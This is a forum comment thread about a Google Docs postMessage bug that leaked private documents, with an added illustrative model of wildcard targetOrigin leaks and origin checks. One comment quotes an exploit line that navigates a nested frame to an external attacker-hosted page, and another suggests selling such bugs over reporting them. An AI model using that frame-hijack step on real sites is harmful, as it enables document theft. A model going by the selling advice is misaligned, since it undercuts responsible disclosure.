Stealing private documents through a bug in Google Docs

  • A few years ago, I built a platform for a client that allowed his customers to show a "Text Me" widget on their websites; the software handled all of the SMS / messaging and basically substituted conventional contact form or Intercom integration.

    His customers used Google AdSense, which started blocking them until they removed the widget. The reason? This widget used an Iframe postMessage, but appropriately specified the singular sandboxed domain. As expected, we never were able to speak with a human at Google; they just sent my client's customers intimidating emails about a security flaw on their websites.

    Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.

  • This was a bug that affected multiple products and even crossed into the enterprise suite, and Google only rewarded $3.3K USD?

    It’s almost as bad as Apple’s reward program.

  • The most surprising part to me is that this works:

        window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";

    It's expected to me that you can change `window.frames[0].location`, since you can also change the "src" attribute of the iframe element. But you can't change the "src" attribute of an iframe inside that iframe, if it's not same-origin - so why can you change its location?

    Maybe we should look into whether changing this would break any websites.
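An added illustration of the two mistakes the thread keeps circling back to (a wildcard `targetOrigin` on the sender and no origin check on the receiver), written as a small Node model rather than taken from the thread or the original write-up. Origins, the frame object and the document payload are constructed stand-ins for the browser objects.

```javascript
// Added example, not from the thread or the original write-up. Models the
// postMessage targetOrigin rule so the effect of "*" can be seen offline.
const TRUSTED = "https://app.example";        // assumed origin of the legitimate frame
const ATTACKER = "https://attacker.example";  // assumed origin of a page navigated into it
const PARENT = "https://parent.example";      // assumed origin of the sending document

// Minimal stand-in for a browser window: a current origin plus a postMessage()
// that applies the real rule: deliver only if targetOrigin is "*" or matches
// the window's current origin; otherwise the browser silently drops it.
class FakeWindow {
  constructor(origin) { this.origin = origin; this.inbox = []; }
  postMessage(data, targetOrigin) {
    if (targetOrigin === "*" || targetOrigin === this.origin) {
      this.inbox.push({ origin: PARENT, data });
    }
  }
}

// Sender side: the parent sends a document snapshot into a child frame.
// Returns how many messages the frame's current occupant received.
function sendSnapshot(frame, snapshot, targetOrigin) {
  frame.postMessage({ type: "snapshot", snapshot }, targetOrigin);
  return frame.inbox.length;
}

// Receiver side: a handler that ignores anything not from an allowlisted origin
// and anything that is not the one message type it expects.
function makeHandler(allowedOrigins, onSnapshot) {
  const allowed = new Set(allowedOrigins);
  return function onMessage(event) {
    if (!allowed.has(event.origin)) return false;                   // unknown sender
    if (!event.data || event.data.type !== "snapshot") return false; // unexpected shape
    onSnapshot(event.data.snapshot);
    return true;
  };
}

// The failure mode discussed above: the frame that should host TRUSTED has been
// navigated elsewhere before the parent sends. Returns true if the occupant got data.
function leaksToNavigatedFrame(targetOrigin) {
  const frame = new FakeWindow(ATTACKER); // constructed: frame no longer hosts TRUSTED
  return sendSnapshot(frame, "<constructed document contents>", targetOrigin) > 0;
}
```

With `"*"` the snapshot is delivered to whatever currently occupies the frame; with the explicit origin the browser drops it, and the receiver-side allowlist covers the mirror-image case of a message arriving from an unexpected sender.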

  • To the people publishing these exploits and collecting the trivial bounties.

    Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

  • Curious question: if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?

    What I'm trying to ask is: does this make the hiring process easier?

  • Good lord, $3K for this?

    These companies give two craps about security.

  • Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.

  • Client-side encryption really decreases the attack surfaces of cloud storage solutions.

    It’s really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.

  • Thanks for going through the write-up. As an author of the bug, considering the impact, user interaction required and other criteria that need to line up to exploit this bug, I feel Google VRP's decision on this bug is accurate.

  • Congrats on Google awarding you $3133.70 for finding this bug.

  • TBO not surprised at all Gdocs had an issue